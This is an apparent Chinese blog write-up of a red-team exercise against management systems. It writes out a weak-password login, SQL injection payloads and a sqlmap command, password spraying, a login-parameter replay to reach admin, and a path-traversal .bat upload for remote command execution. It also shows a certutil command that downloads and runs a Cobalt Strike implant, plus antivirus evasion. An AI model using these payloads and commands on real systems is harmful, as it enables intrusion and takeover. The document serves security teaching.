记一次峰回路转的渗透测试

admin 2022年4月20日16:41:49安全文章评论13 views2307字阅读7分41秒阅读模式
3月23号,晴,在实验室复现着几天前打的CTF的题目的时候接到了一个hvv通知,在晚上的时候下发了几十个靶标,吃好饭后又回到了实验室去大致看了看靶标,基本是一些门户网站和几个管理系统,看着像若依,于是就开始了对这些网站的信息收集,最终挑了几个管理系统。


拿到站点之后,8083端口是一个登录界面,试了一下弱口令 admin/123456 成功进入了后台

记一次峰回路转的渗透测试
进入后台后,大致翻了一下功能点,想找一找有没有啥可以上传的地方,翻了一圈没找到。
然后打算抓包对一些参数进行测试,试了很多查询的点但是里面的参数好像都无法利用,后来在导出功能的 billNos 参数处发现sql注入漏洞
记一次峰回路转的渗透测试
我们在burp中用单引号闭合billNos参数可以看到sql的报错语句
记一次峰回路转的渗透测试
这里我们先手动测试一下
') and 1=1 --+ 返回了正确的值
') and 1=2 --+ 返回了错误的值
') and updatexml(1,concat(0x7e,(@@version,0x7e),1)# --+ 直接爆出了版本
记一次峰回路转的渗透测试
记一次峰回路转的渗透测试
记一次峰回路转的渗透测试
这里我就直接上sqlmap去跑了,把数据包复制到txt文件中直接sqlmap -r 去跑 billNos 参数,这里我们直接 --risk 3 --level 5拉满去跑,然后使用 --random-agent 随机请求头,使用 --technique=E 来指定使用报错注入
sqlmap -r test.txt --risk 3 --level 5 --random-agent --technique=E
注意这个位置要选默认的 N
记一次峰回路转的渗透测试
可以看到跑出了数据库信息
记一次峰回路转的渗透测试
然后我们就直接去跑数据库名了
记一次峰回路转的渗透测试
简单的查询了一下,发现数据库有如下的对应关系
记一次峰回路转的渗透测试
这里发现其中一个数据库好像是若依系统数据库,dump出 sys_user 表如下
记一次峰回路转的渗透测试
然后解出管理员密码,去该数据库对应的网站,这里尝试了很久,admin这个账号始终登不进去,其他账号的密码也爆破不出来
这时候我们再尝试扫了一下该网站的C段,找到了一个和我们第一个看到的站点类似的网站
记一次峰回路转的渗透测试
这里习惯性的先试了一下弱口令,发现没有,于是想到刚刚跑出来的那些数据库,去翻了翻,在另一个数据库中dump出用户表
记一次峰回路转的渗透测试
这里的密码都被加密了,但是我们可以看到用户名,所以换个思路我们固定 123456 这个密码,然后去批量爆破用户名
爆破完毕后,发现爆破出了几个用户
记一次峰回路转的渗透测试
这里我们用system01用户登录,密码为123456 ,成功登录
记一次峰回路转的渗透测试
翻了一翻功能点,发现了有上传的地方,上传后还可以看到泄露的路径,但是会自动重命名且加上jpg后缀
记一次峰回路转的渗透测试
这里我们又找到了一个上传点,在这里上传文件后,后缀不会改变,而且可用 ../ 控制上传路径,上传的路径还被映射到本ip 8082端口搭载的静态网站根目录下
记一次峰回路转的渗透测试
记一次峰回路转的渗透测试
记一次峰回路转的渗透测试
但是经过测试发现上传的目录都是静态目录,无法解析我们上传地木马文件,解析不了文件就啥都白搭了
于是我们继续翻一翻功能点,找到了操作日志,里面记录了用户登录的请求参数,而且有admin的
记一次峰回路转的渗透测试
这时候我们回去看看一看登录处的数据包,看到请求参数是我们可控的,这样我们是不是就可以伪造admin用户登录了呢
记一次峰回路转的渗透测试
所以这里直接把参数换成admin的请求参数,成功登录admin用户
记一次峰回路转的渗透测试
这时候我们的权限就比刚才大多了,翻到了很多刚刚system01用户没有的功能点,我们看到一个数据备份恢复的地方然后点击备份,发现提示 找不到批处理文件 .bat ,这说明这里运行了db-backup.bat文件,仔细一想这里是不是能运行bat文件,众所周知bat文件是批量处理windows命令的文件,而前面又有文件上传点且上传路径可控,那我们不就可以通过文件上传把bat文件上传到该目录下,然后在bat文件中写入我们要执行的命令,这样就达到了RCE的效果
记一次峰回路转的渗透测试
这里我们将whoami执行的结果放到映射的目录中,这样我们访问本ip的8082端口的1.txt文件就可以看到命令执行的结果了
记一次峰回路转的渗透测试
记一次峰回路转的渗透测试
可以看到命令执行 成功
记一次峰回路转的渗透测试
然后就可以做个免杀的马子上线CS了,我们做好木马之后,使用CS的钓鱼攻击里的文件下载模块,生成下载木马的URL
记一次峰回路转的渗透测试
然后就可以使用windows自带的certutil命令将木马下到本地并执行了
certutil -urlcache -split -f URL
我们将原先的那个命令替换为上面这条下载命令和运行木马文件的命令,然后再次将这个.bat文件上传,然后点击备份,这里提示木马下载成功但是运行时找不到文件,难道有啥软把马子删了,于是这里我们尝试执行tasklist命令查看进程,看看有没有杀软
记一次峰回路转的渗透测试
记一次峰回路转的渗透测试
果然,有360和Microsoft Security Essentials
这里我针对性的做了免杀
即可看到执行成功并且我们的CS也可以看到上线了
记一次峰回路转的渗透测试
然后我们执行 net user /domian 发现没有域环境,那就到这里了
记一次峰回路转的渗透测试

-END-

记一次峰回路转的渗透测试如果本文对您有帮助,来个点赞在看就是对我们莫大的鼓励。记一次峰回路转的渗透测试



  推荐关注:




记一次峰回路转的渗透测试
弱口令安全实验室正式成立于2022年1月,是思而听(山东)网络科技有限公司旗下的网络安全研究团队,专注于网络攻防技术渗透测试硬件安全安全开发网络安全赛事以及网安线上教育领域研究几大板块。
团队社群氛围浓厚,同时背靠思而听(山东)网络科技有限公司旗下的“知行网络安全教育平台”作为社区,容纳同好在安全领域不断进行技术提升以及技术分享,从而形成良好闭环。

团队全员均持CISP-PTE(注册信息安全专业人员-渗透测试工程师)认证,积极参与着各类网络安全赛事并屡获佳绩,同时多次高水准的完成了国家级、省部级攻防演习活动以及相关重报工作,均得到甲方的一致青睐与肯定。

欢迎对网络安全技术感兴趣的你来加入我们实验室,可在公众号内依次点击【关于我们】-【加入我们】来获取联系方式~


原文始发于微信公众号(弱口令安全实验室):记一次峰回路转的渗透测试

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年4月20日16:41:49
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  记一次峰回路转的渗透测试 http://cn-sec.com/archives/929634.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: